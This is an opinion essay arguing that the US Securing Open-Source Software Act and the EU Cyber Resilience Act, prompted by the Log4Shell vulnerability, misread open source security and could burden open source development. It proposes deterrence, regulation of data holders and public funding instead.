Open source software (OSS) is mainstream today, but just because it's widely used doesn't mean it's widely understood. And this is especially true when it comes to OSS and security. That lack of understanding, when expressed through legislation, poses a major threat to open source.
Use ≠ Understanding
Despite its widespread use, there's no shortage of misconceptions around open source and security.
Some have argued for security by obscurity. They claim that if source code is visible to the public, it becomes inherently less secure. The logic follows that by knowing what's under the hood, malicious actors can gain insights into vulnerabilities and exploit weaknesses in the codebase. This ignores the fact that security vulnerabilities are discovered in proprietary software all the time without access to source code.
Another gap in understanding is how open source is produced, where it's deployed in an organization, and a lack of adequate planning to deal with open source vulnerabilities when they arise.
Organizations have embraced open source to help run their business and enjoy its benefits — but they haven't fully understood or planned for the tradeoffs.
Open source isn't less secure than proprietary software, but that doesn't mean it's exactly like proprietary software, either. Organizations consuming open source software can't expect it to fit neatly into the vendor/supplier model they were used to with proprietary software.
Log4Shell Draws Legislator Attention
This difference was put in the spotlight by the Log4Shell saga that dominated headlines for the latter half of 2021. As most already know, the open source Apache Logging Services project, Log4j, was subject to a high-severity, critical vulnerability in late 2021, dubbed Log4Shell.
The vulnerability could allow threat actors to perform remote code execution (RCE) that could give malicious actors control over the victim's machine. While it was far from the first RCE vulnerability discovered in the wild, thanks to Log4j's relative ubiquity its potential for damage was significant and far-reaching.
And although in retrospect the devastation was significantly less than what most had anticipated, the fervor was enough to spur legislators on both sides of the Atlantic into action — leading to the Securing Open-Source Software Act (SOSSA) in the US and the Cyber Resilience Act (CRA) in the European Union.
Where SOSSA Goes Wrong
Both of these pieces of legislation seem to be ineffective at best and damaging to the open source ecosystem at worst. We'll first look at SOSSA as the less concerning of the two.
First, it creates an impression that open source is uniquely insecure. It isn't — in fact, the opposite is true. Proprietary software has similar problems — you can have widely distributed proprietary software that includes outdated and insecure dependencies and flaws, and no one but the vendor knows what's in the source code or has the means to address those flaws.
Second, SOSSA mandates coordination "as appropriate" and tells the Cybersecurity and Infrastructure Security Agency (CISA) to assist in coordinated vulnerability disclosures, but issues this mandate without offering a dime of funding. If legislators want to get serious about open source security and maintenance, their first move should be to fund its development and participation over the long term. Short-term fixes, like bug and security bounties, create more work for projects than they provide help.
Third, the proposed legislation offers nothing in the way of deterrence. It gives the impression that the legislators view cyberattacks as natural disasters, outside the control of law enforcement, rather than crimes that can be, and should be, aggressively punished.
Ultimately, SOSSA is (in the words of Douglas Adams) "mostly harmless." It could be a lot better, but it could be a lot worse, too. How much worse? The European Commission's Cyber Resilience Act may have some ideas.
What's at Stake With the EU's CRA
A number of organizations and smart people have already written about the impacts of the CRA in its current form. In short, it wants to impose compliance requirements on hardware and software that include performing updates, following development practices, assessing risks, and so on.
Like SOSSA, the CRA puts the burden on producers of software and looks to producers/manufacturers to secure software. And while it tries to exempt open source software "supplied outside the course of commercial activity," where exactly that line is drawn remains unclear. For example, does a not-for-profit entity that offers some form of support become obligated to comply with these rules?
In short, the CRA is probably not great legislation even if only considering proprietary software. But attempting to impose this legislation on open source software will result in additional burdens for organizations such as the Eclipse Foundation and could have a chilling effect on individual open source participation.
What Governments Do With OSS
All of this isn't to say that legislators have no role in improving cybersecurity. If their intent is to harden the security of our modern software stack, there are decidedly better ways they could go about it.
First and foremost, I believe that legislators should focus more of their efforts on deterrence.
Governments would also be wise to develop better legislation and regulation around sensitive data. Rather than putting a burden on producers of software, put it on the entities that hold the data that attracts attackers in the first place.
Finally, rather than simply rolling out restrictions and ever-stricter mandates, governments around the world ought to actually support the open source ecosystem. Hire, fund, and otherwise support teams to help study, maintain, and secure our vital open source infrastructure.
At the end of the day, it's a good thing that governments are raising awareness and attempting to improve civic understanding of open source technologies. Hopefully, these efforts and discussions will lead to increased participation. It's important, though, that an urge to "do something!" in response to specific security incidents doesn't lead to stifling open source development.